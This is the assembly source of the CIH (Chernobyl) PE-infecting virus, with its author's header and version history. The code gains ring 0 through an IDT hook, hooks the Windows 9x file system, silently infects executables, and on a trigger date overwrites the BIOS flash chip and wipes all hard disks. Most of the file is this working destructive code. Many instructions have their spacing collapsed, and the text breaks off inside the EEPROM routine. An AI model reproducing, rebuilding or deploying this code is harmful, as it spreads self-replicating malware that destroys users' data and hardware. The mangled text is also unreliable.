; ****************************************************************************
; * The Virus Program Information *
; ****************************************************************************
; * *
; * Designer : CIH Source : TTIT of TATUNG in Taiwan *
; * Create Date : 04/26/1998 E-mail : WinCIH.Tatung@usa.net *
; * Modification Time : 06/01/1998 Version : 1.5 *
; * *
; * Turbo Assembler Version 5.0 : Tasm /m cih *
; * Turbo Link Version 5.01 : Tlink /3 /t cih, cih.exe *
; * *
; *==========================================================================*
; * Modification History *
; *==========================================================================*
; * v1.0 1. Create the Virus Program. *
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *
; * 04/26/1998 3. Virus Code doesn't Reload into System. *
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *
; * 6. When System Opens Existing PE File, the File will be *
; * Infected, and the File doesn't be Reinfected. *
; * 7. It is also Infected, even the File is Read-Only. *
; * 8. When the File is Infected, the Modification Date and Time *
; * of the File also don't be Changed. *
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *
; * Previous FileSystemApiHook, it will Call the Function *
; * that the IFS Manager Would Normally Call to Implement *
; * this Particular I/O Request. *
; * 10. The Virus Size is only 656 Bytes. *
; *==========================================================================*
; * v1.1 1. Especially, the File that be Infected will not Increase *
; * it's Size... ^__^ *
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. *
; * When Exception Error Occurs, Our OS System should be in *
; * Windows NT. So My Cute Virus will not Continue to Run, *
; * it will Jmup to Original Application to Run. *
; * 3. Use Better Algorithm, Reduce Virus Code Size. *
; * 4. The Virus "Basic" Size is only 796 Bytes. *
; *==========================================================================*
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *
; * 2. Modify the Bug of v1.1 *
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *
; *==========================================================================*
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. *
; * So When Open WinZip Self-Extractor ==> Don't Infect it. *
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. *
; *==========================================================================*
; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs Error. *
; * 2. Change the Date of Killing Computers. *
; * 05/31/1998 3. Modify Virus Version Copyright. *
; * 4. The Virus "Basic" Size is 1019 Bytes. *
; ****************************************************************************
; * v1.5 1. Full Modify the Bug : Change Harddisk Killing Port *
; * 2. Modify Virus Version Copyright. *
; * 06/01/1998 3. Clear Garbage in Source Code. *
; * 4. The Virus "Small" Size in 10xx Bytes. *
; ****************************************************************************
.586
; ****************************************************************************
; * Original PE Executable File(Don't Modify this Section) *
; ****************************************************************************
OriginalAppEXE SEGMENT
FileHeader:
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
dd00000000h, VirusSize
OriginalAppEXE ENDS
; ****************************************************************************
; * My Virus Game *
; ****************************************************************************
; *********************************************************
; * Constant Define *
; *********************************************************
TRUE=1
FALSE=0
DEBUG=TRUE
IFDEBUG
FirstKillHardDiskNumber = 82h
HookExceptionNumber = 06h
ELSE
FirstKillHardDiskNumber = 81h
HookExceptionNumber = 04h
ENDIF
FileNameBufferSize=7fh
; *********************************************************
; *********************************************************
VirusGame SEGMENT
ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame
; *********************************************************
; * Ring3 Virus Game Initial Program *
; *********************************************************
MyVirusStart:
pushebp
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************
leaeax, [esp-04h*2]
xorebx, ebx
xchgeax, fs:[ebx]
call@0
@0:
popebx
leaecx, StopToRunVirusCode-@0[ebx]
pushecx
pusheax
; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************
pusheax;
sidt [esp-02h] ; Get IDT Base Address
pop ebx ;
add ebx, HookExceptionNumber*08h+04h ; ZF = 0
cli
mov ebp, [ebx] ; Get Exception Base
mov bp, [ebx-04h] ; Entry Point
lea esi, MyExceptionHook-@1[ecx]
pushesi
mov[ebx-04h], si;
shresi, 16; Modify Exception
mov[ebx+02h], si; Entry Point Address
popesi
; *************************************
; * Generate Exception to Get Ring0 *
; *************************************
intHookExceptionNumber; GenerateException
ReturnAddressOfEndException=$
; *************************************
; * Merge All Virus Code Section *
; *************************************
pushesi
movesi, eax
LoopOfMergeAllVirusCodeSection:
movecx, [eax-04h]
repmovsb
subeax, 08h
movesi, [eax]
oresi, esi
jzQuitLoopOfMergeAllVirusCodeSection ; ZF = 1
jmpLoopOfMergeAllVirusCodeSection
QuitLoopOfMergeAllVirusCodeSection:
popesi
; *************************************
; * Generate Exception Again *
; *************************************
intHookExceptionNumber; GenerateException Again
; *************************************
; * Let's Restore *
; * Structured Exception Handing *
; *************************************
ReadyRestoreSE:
sti
xorebx, ebx
jmpRestoreSE
; *************************************
; * When Exception Error Occurs, *
; * Our OS System should be in NT. *
; * So My Cute Virus will not *
; * Continue to Run, it Jmups to *
; * Original Application to Run. *
; *************************************
StopToRunVirusCode:
@1=StopToRunVirusCode
xorebx, ebx
moveax, fs:[ebx]
movesp, [eax]
RestoreSE:
popdword ptr fs:[ebx]
popeax
; *************************************
; * Return Original App to Execute *
; *************************************
popebp
push 00401000h ; Push Original
OriginalAddressOfEntryPoint=$-4; App Entry Point to Stack
ret ; Return to Original App Entry Point
; *********************************************************
; * Ring0 Virus Game Initial Program *
; *********************************************************
MyExceptionHook:
@2=MyExceptionHook
jzInstallMyFileSystemApiHook
; *************************************
; * Do My Virus Exist in System !? *
; *************************************
movecx, dr0
jecxzAllocateSystemMemoryPage
adddword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException
; *************************************
; * Return to Ring3 Initial Program *
; *************************************
ExitRing0Init:
mov[ebx-04h], bp;
shrebp, 16; Restore Exception
mov[ebx+02h], bp;
iretd
; *************************************
; * Allocate SystemMemory Page to Use *
; *************************************
AllocateSystemMemoryPage:
movdr0, ebx; Set the Mark of My Virus Exist in System
push00000000fh;
pushecx;
push0ffffffffh;
pushecx;
pushecx;
pushecx;
push000000001h;
push000000002h;
int20h; VMMCALL _PageAllocate
_PageAllocate=$;
dd00010053h; Use EAX, ECX, EDX, and flags
addesp, 08h*04h
xchgedi, eax; EDI = SystemMemory Start Address
leaeax, MyVirusStart-@2[esi]
iretd; Return to Ring3 Initial Program
; *************************************
; * Install My File System Api Hook *
; *************************************
InstallMyFileSystemApiHook:
leaeax, FileSystemApiHook-@6[edi]
pusheax ;
int20h ; VXDCALL IFSMgr_InstallFileSystemApiHook
IFSMgr_InstallFileSystemApiHook = $
dd 00400067h; Use EAX, ECX, EDX, and flags
movdr0, eax; Save OldFileSystemApiHook Address
popeax; EAX = FileSystemApiHook Address
; Save Old IFSMgr_InstallFileSystemApiHook Entry Point
movecx, IFSMgr_InstallFileSystemApiHook-@2[esi]
movedx, [ecx]
movOldInstallFileSystemApiHook-@3[eax], edx
; Modify IFSMgr_InstallFileSystemApiHook Entry Point
leaeax, InstallFileSystemApiHook-@3[eax]
mov[ecx], eax
cli
jmpExitRing0Init
; *********************************************************
; * Code Size of Merge Virus Code Section *
; *********************************************************
CodeSizeOfMergeVirusCodeSection=offset $
; *********************************************************
; * IFSMgr_InstallFileSystemApiHook *
; *********************************************************
InstallFileSystemApiHook:
pushebx
call@4;
@4:;
popebx; mov ebx, offset FileSystemApiHook
addebx, FileSystemApiHook-@4;
pushebx
int20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook
IFSMgr_RemoveFileSystemApiHook=$
dd 00400068h; Use EAX, ECX, EDX, and flags
popeax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link Client FileSystemApiHook
pushdword ptr [esp+8]
callOldInstallFileSystemApiHook-@3[ebx]
popecx
pusheax
; Call Original IFSMgr_InstallFileSystemApiHook
; to Link My FileSystemApiHook
pushebx
callOldInstallFileSystemApiHook-@3[ebx]
popecx
movdr0, eax; Adjust OldFileSystemApiHook Address
popeax
popebx
ret
; *********************************************************
; *Static Data *
; *********************************************************
OldInstallFileSystemApiHookdd?
; *********************************************************
; * IFSMgr_FileSystemHook *
; *********************************************************
; *************************************
; * IFSMgr_FileSystemHook Entry Point *
; *************************************
FileSystemApiHook:
@3=FileSystemApiHook
pushad
call @5;
@5:;
pop esi; mov esi, offset VirusGameDataStartAddress
add esi, VirusGameDataStartAddress-@5
; *************************************
; * Is OnBusy !? *
; *************************************
testbyte ptr (OnBusy-@6)[esi], 01h; if ( OnBusy )
jnzpIFSFunc; goto pIFSFunc
; *************************************
; * Is OpenFile !? *
; *************************************
; if ( NotOpenFile )
; goto prevhook
leaebx, [esp+20h+04h+04h]
cmpdword ptr [ebx], 00000024h
jneprevhook
; *************************************
; * Enable OnBusy *
; *************************************
incbyte ptr (OnBusy-@6)[esi]; Enable OnBusy
; *************************************
; * Get FilePath's DriveNumber, *
; * then Set the DriveName to *
; * FileNameBuffer. *
; *************************************
; * Ex. If DriveNumber is 03h, *
; * DriveName is 'C:'. *
; *************************************
addesi, FileNameBuffer-@6
pushesi
moval, [ebx+04h]
cmpal, 0ffh
jeCallUniToBCSPath
addal, 40h
movah, ':'
mov[esi], eax
incesi
incesi
; *************************************
; * UniToBCSPath *
; *************************************
; * This Service Converts *
; * a Canonicalized Unicode Pathname *
; * to a Normal Pathname in the *
; * Specified BCS Character Set. *
; *************************************
CallUniToBCSPath:
push00000000h
pushFileNameBufferSize
movebx, [ebx+10h]
moveax, [ebx+0ch]
addeax, 04h
pusheax
pushesi
int20h; VXDCall UniToBCSPath
UniToBCSPath=$
dd00400041h
addesp, 04h*04h
; *************************************
; * Is FileName '.EXE' !? *
; *************************************
cmp[esi+eax-04h], 'EXE.'
popesi
jneDisableOnBusy
IFDEBUG
; *************************************
; * Only for Debug *
; *************************************
cmp[esi+eax-06h], 'KCUF'
jneDisableOnBusy
ENDIF
; *************************************
; * Is Open Existing File !? *
; *************************************
; if ( NotOpenExistingFile )
; goto DisableOnBusy
cmpword ptr [ebx+18h], 01h
jneDisableOnBusy
; *************************************
; * Get Attributes of the File *
; *************************************
movax, 4300h
int20h; VXDCall IFSMgr_Ring0_FileIO
IFSMgr_Ring0_FileIO=$
dd00400032h
jcDisableOnBusy
pushecx
; *************************************
; * Get IFSMgr_Ring0_FileIO Address *
; *************************************
movedi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi]
movedi, [edi]
; *************************************
; * Is Read-Only File !? *
; *************************************
testcl, 01h
jzOpenFile
; *************************************
; * Modify Read-Only File to Write *
; *************************************
movax, 4301h
xorecx, ecx
calledi; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Open File *
; *************************************
OpenFile:
xoreax, eax
movah, 0d5h
xorecx, ecx
xoredx, edx
incedx
movebx, edx
incebx
calledi; VXDCall IFSMgr_Ring0_FileIO
xchgebx, eax; mov ebx, FileHandle
; *************************************
; * Need to Restore *
; * Attributes of the File !? *
; *************************************
popecx
pushf
testcl, 01h
jzIsOpenFileOK
; *************************************
; * Restore Attributes of the File *
; *************************************
movax, 4301h
calledi; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Is Open File OK !? *
; *************************************
IsOpenFileOK:
popf
jcDisableOnBusy
; *************************************
; * Open File Already Succeed. ^__^ *
; *************************************
pushesi; Push FileNameBuffer Address to Stack
pushf; Now CF = 0, Push Flag to Stack
addesi, DataBuffer-@7 ; mov esi, offset DataBuffer
; ***************************
; * Get OffsetTonewHeader *
; ***************************
xoreax, eax
movah, 0d6h
; For Doing Minimal VirusCode's Length,
; I Save EAX to EBP.
movebp, eax
push00000004h
popecx
push0000003ch
popedx
calledi; VXDCall IFSMgr_Ring0_FileIO
movedx, [esi]
; ***************************
; * Get 'PE\0' Signature *
; * of ImageFileHeader, and *
; * Infected Mark. *
; ***************************
decedx
moveax, ebp
calledi; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
cmpdword ptr [esi], 00455000h
jneCloseFile
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
pushebx; Save File Handle
push00h; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push01h; Size
pushedx; Pointer of File
pushedi; Address of Buffer
; ***************************
; * Save ESP Register *
; ***************************
movdr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
pusheax; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
moveax, ebp
movcl, SizeOfImageHeaderToRead
addedx, 07h ; Move EDX to NumberOfSections
calledi ; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
leaeax, (AddressOfEntryPoint-@8)[edx]
pusheax; Pointer of File
leaeax, (NewAddressOfEntryPoint-@8)[esi]
pusheax; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzxeax, word ptr (SizeOfOptionalHeader-@8)[esi]
leaedx, [eax+edx+12h]
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
moval, SizeOfScetionTable
; I Assume NumberOfSections <= 0ffh
movcl, (NumberOfSections-@8)[esi]
mulcl
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
leaesi, (StartOfSectionTable-@8)[esi]
pusheax; Size
pushedx; Pointer of File
pushesi; Address of Buffer
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
incecx
pushecx; Save NumberOfSections+1
shlecx, 03h
pushecx; Save TotalSizeOfVirusCodeSectionTable
addecx, eax
addecx, edx
subecx, (SizeOfHeaders-@9)[esi]
notecx
incecx
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
pushecx
xchgecx, eax; ECX = Size of Section Table
; Save Original Address of Entry Point
moveax, (AddressOfEntryPoint-@9)[esi]
addeax, (ImageBase-@9)[esi]
mov(OriginalAddressOfEntryPoint-@9)[esi], eax
cmpword ptr [esp], small CodeSizeOfMergeVirusCodeSection
jlOnlySetInfectedMark
; ***************************
; * Read All Section Tables *
; ***************************
moveax, ebp
calledi; VXDCall IFSMgr_Ring0_FileIO
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchgeax, ebp
push00000004h
popecx
pushedx
movedx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
addedx, 12h
calledi; VXDCall IFSMgr_Ring0_FileIO
cmp dword ptr [esi], 'piZniW'
jeNotSetInfectedMark
popedx
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
;Size of Following Section Table
popebx
popedi; EDI = TotalSizeOfVirusCodeSectionTable
popecx; ECX = NumberOfSections+1
pushedi; Size
addedx, ebp
pushedx; Pointer of File
addebp, esi
pushebp; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
leaeax, [ebp+edi-04h]
mov[eax], ebx
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
pushebx; Size
addedx, edi
pushedx; Pointer of File
leaedi, (MyVirusStart-@9)[esi]
pushedi; Address of Buffer
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov(NewAddressOfEntryPoint-@9)[esi], edx
; ***************************
; * Setup Initial Data *
; ***************************
leaedx, [esi-SizeOfScetionTable]
movebp, offset VirusSize
jmpStartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
addedx, SizeOfScetionTable
movebx, (SizeOfRawData-@9)[edx]
subebx, (VirtualSize-@9)[edx]
jbeEndOfWriteCodeToSections
pushebx; Size
subeax, 08h
mov[eax], ebx
movebx, (PointerToRawData-@9)[edx]
addebx, (VirtualSize-@9)[edx]
pushebx; Pointer of File
pushedi; Address of Buffer
movebx, (VirtualSize-@9)[edx]
addebx, (VirtualAddress-@9)[edx]
addebx, (ImageBase-@9)[esi]
mov[eax+4], ebx
movebx, [eax]
add(VirtualSize-@9)[edx], ebx
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or(Characteristics-@9)[edx], 40000040h
StartToWriteCodeToSections:
subebp, ebx
jbeSetVirusCodeSectionTableEndMark
addedi, ebx; Move Address of Buffer
EndOfWriteCodeToSections:
loopLoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
movesp, dr1
jmpWriteVirusCodeToFile
; ***************************
; * Not Set Infected Mark *
; ***************************
NotSetInfectedMark:
addesp, 3ch
jmpCloseFile
; ***************************
; * Set Virus Code *
; * Section Table End Mark *
; ***************************
SetVirusCodeSectionTableEndMark:
; Adjust Size of Virus Section Code to Correct Value
add[eax], ebp
add[esp+08h], ebp
; Set End Mark
xorebx, ebx
mov[eax-04h], ebx
; ***************************
; * When VirusGame Calls *
; * VxDCall, VMM Modifies *
; * the 'int 20h' and the *
; * 'Service Identifier' *
; * to 'Call [XXXXXXXX]'. *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First. ^__^ *
; ***************************
leaeax, (LastVxDCallAddress-2-@9)[esi]
movcl, VxDCallTableSize
LoopOfRestoreVxDCallID:
movword ptr [eax], 20cdh
movedx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
mov[eax+2], edx
movzxedx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
subeax, edx
loopLoopOfRestoreVxDCallID
; ***************************
; * Let's Write *
; * Virus Code to the File *
; ***************************
WriteVirusCodeToFile:
moveax, dr1
movebx, [eax+10h]
movedi, [eax]
LoopOfWriteVirusCodeToFile:
popecx
jecxzSetFileModificationMark
movesi, ecx
moveax, 0d601h
popedx
popecx
calledi; VXDCall IFSMgr_Ring0_FileIO
jmpLoopOfWriteVirusCodeToFile
; ***************************
; * Let's Set CF = 1 ==> *
; * Need to Restore File *
; * Modification Time *
; ***************************
SetFileModificationMark:
popebx
popeax
stc; Enable CF(Carry Flag)
pushf
; *************************************
; * Close File *
; *************************************
CloseFile:
xoreax, eax
movah, 0d7h
calledi; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Need to Restore File Modification *
; * Time !? *
; *************************************
popf
popesi
jncIsKillComputer
; *************************************
; * Restore File Modification Time *
; *************************************
movebx, edi
movax, 4303h
movecx, (FileModificationTime-@7)[esi]
movedi, (FileModificationTime+2-@7)[esi]
callebx; VXDCall IFSMgr_Ring0_FileIO
; *************************************
; * Disable OnBusy *
; *************************************
DisableOnBusy:
decbyte ptr (OnBusy-@7)[esi]; Disable OnBusy
; *************************************
; * Call Previous FileSystemApiHook *
; *************************************
prevhook:
popad
moveax, dr0;
jmp[eax]; Jump to prevhook
; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; *************************************
pIFSFunc:
movebx, esp
pushdword ptr [ebx+20h+04h+14h]; Push pioreq
call[ebx+20h+04h]; Call pIFSFunc
popecx;
mov[ebx+1ch], eax; Modify EAX Value in Stack
; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; ***************************
cmpdword ptr [ebx+20h+04h+04h], 00000024h
jneQuitMyVirusFileSystemHook
; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; *****************
moveax, [ecx+28h]
mov(FileModificationTime-@6)[esi], eax
; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; ***************************
QuitMyVirusFileSystemHook:
popad
ret
; *************************************
; * Kill Computer !? ... *^_^* *
; *************************************
IsKillComputer:
; Get Now Day from BIOS CMOS
moval, 07h
out70h, al
inal, 71h
xor al, 01h ; ??/26/????
IFDEBUG
jmpDisableOnBusy
ELSE
jnzDisableOnBusy
ENDIF
; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************
; ***************************
; * Kill BIOS EEPROM *
; ***************************
movbp, 0cf8h
leaesi, IOForEEPROM-@7[esi]
; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; ***********************
movedi, 8000384ch
movdx, 0cfeh
cli
callesi
; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
movdi, 0058h
decedx; and al,0fh
movword ptr (BooleanCalculateCode-@10)[esi], 0f24h
callesi
; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; ***********************
leaebx, EnableEEPROMToWrite-@10[esi]
moveax, 0e5555h
movecx, 0e2aaah
callebx
movbyte ptr [eax], 60h
pushecx
loop$
; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; ***********************
xorah, ah
mov[eax], al
xchgecx, eax
loop$
; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; ***********************
moveax, 0f5555h
popecx
movch, 0aah
callebx
movbyte ptr [eax], 20h
loop$
; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; ***********************
movah, 0e0h
mov[eax], al
; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; ***********************
; or al,10h
movword ptr (BooleanCalculateCode-@10)[esi], 100ch
callesi
; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************
KillHardDisk:
xorebx, ebx
movbh, FirstKillHardDiskNumber
pushebx
subesp, 2ch
push0c0001000h
movbh, 08h
pushebx
pushecx
pushecx
pushecx
push40000501h
incecx
pushecx
pushecx
movesi, esp
subesp, 0ach
LoopOfKillHardDisk:
int20h
dd00100004h; VXDCall IOS_SendCommand
cmpword ptr [esi+06h], 0017h
jeKillNextDataSection
ChangeNextHardDisk:
incbyte ptr [esi+4dh]
jmpLoopOfKillHardDisk
KillNextDataSection:
adddword ptr [esi+10h], ebx
movbyte ptr [esi+4dh], FirstKillHardDiskNumber
jmpLoopOfKillHardDisk
; ***************************
; * Enable EEPROM to Write *
; ***************************
EnableEEPROMToWrite:
mov[eax], cl
mov[ecx], al
